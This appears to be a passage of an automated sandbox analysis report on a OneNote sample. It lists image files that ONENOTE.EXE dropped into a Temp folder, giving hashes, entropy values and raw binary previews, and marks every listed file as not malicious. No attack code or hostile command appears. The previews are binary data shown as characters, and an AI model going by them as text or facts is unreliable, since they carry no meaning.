                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{8171BD67-5A75-458F-91A7-FD0B8ADBFB79}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8184
                                                                                                                                            Entropy (8bit):7.807848176906598
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                            MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                            SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                            SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                            SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{824B5B5D-51EB-482B-B1EA-F152DEFD4EBD}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14458
                                                                                                                                            Entropy (8bit):7.944094738048628
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                            MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                            SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                            SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                            SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{82A3A45A-C66A-453C-9D9C-AC7753FFF3B0}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2232
                                                                                                                                            Entropy (8bit):7.837610270261933
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                            MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                            SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                            SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                            SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{8423A36C-2537-46A9-A790-6CA2A8472587}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22203
                                                                                                                                            Entropy (8bit):6.977175130747846
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                                                            MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                                                            SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                                                            SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                                                            SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{84675952-B1FE-400D-ABAC-8BF6B22A0018}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, progressive, precision 8, 1312x424, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):54127
                                                                                                                                            Entropy (8bit):7.804118984558617
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:4uWStwiFAImRuCERn9FCD7OTseOMUX7we1WHzjKALnTCCCCCCCCCCCCCCCCCCCCp:4uWt4AJERnyNenUWHCoTCCCCCCCCCCCm
                                                                                                                                            MD5:2CCB7FD40E61B6DD2CD936E61929FB81
                                                                                                                                            SHA1:B10AC2D16273A785C6B73E4CE047716CB451BE1C
                                                                                                                                            SHA-256:CBF4835796C6C58C2EEBB12BFE73AAAE73D0E9F37C5BD5DC63092ED776485FE8
                                                                                                                                            SHA-512:A83BFF1E484CAB88E97B72083A1E232A87856253928C1434F48C904343845AFEC8D2B1084E0BEF102C46413A34F9D8D1CB25A280FD968FF19927E17601326946
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{84915E54-C61A-4917-8619-D1281A20CC07}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):67991
                                                                                                                                            Entropy (8bit):7.870481231782746
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
                                                                                                                                            MD5:1271B1905D18A40D79A5B9DB27EE97EA
                                                                                                                                            SHA1:9618608FBD7342DE6C71220A36C3F4995BA9C13E
                                                                                                                                            SHA-256:5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
                                                                                                                                            SHA-512:C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi*.k..?#..._...X..R.&]..[..;../]L..f..V......*.e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{84A94210-64AF-4462-81F0-E43E621D4164}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7374
                                                                                                                                            Entropy (8bit):7.955141875077912
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                            MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                            SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                            SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                            SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{85D2B8EA-2306-4C9A-AC93-D3E2DD31F98E}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, progressive, precision 8, 1692x810, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):88911
                                                                                                                                            Entropy (8bit):7.701779182597222
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:4a+us0Yfpw9/WFi5HrTy2NtTWR7f2f5RNzQiiiiiiiiiiiiiimL1Vmwwn:4aA0YRw9/WITtTWR7IbNzvL1an
                                                                                                                                            MD5:4D5F7AFD30851031376DA0FA6D0E3F80
                                                                                                                                            SHA1:02154E502F09DDD49FFB8F55D0651FFCD7379B94
                                                                                                                                            SHA-256:F918BB0C65D2F90593265FE4087B9C6905148BD7B46579D902B9ABD5415415F5
                                                                                                                                            SHA-512:ED8BF498C66F59D252DA77CA490B067AF4106F3EA421A024C1C56D2AB63037B0E8BA71961D06370DB76773B08E1BE298C770395DD6CB131F2CE48BDF1D11711B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{8633698E-37F3-4572-A60B-A22B98B8DA7B}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22634
                                                                                                                                            Entropy (8bit):7.974332204835705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                            MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                            SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                            SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                            SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{86522949-7EF5-4FD8-B786-906CA231FE71}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22634
                                                                                                                                            Entropy (8bit):7.974332204835705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                            MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                            SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                            SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                            SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{871E0426-0513-4A94-B7B4-C32681D64A4C}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.943341403425058
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                            MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                            SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                            SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                            SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{87F8EE95-D105-4AF3-93B1-D7FF5F5E15D0}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):53259
                                                                                                                                            Entropy (8bit):7.651662052139301
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                                                            MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                                                            SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                                                            SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                                                            SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{884F0C51-C69F-4B28-9865-5E558B2BDDC6}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17289
                                                                                                                                            Entropy (8bit):7.962998633267186
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                            MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                            SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                            SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                            SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                            Malicious:false
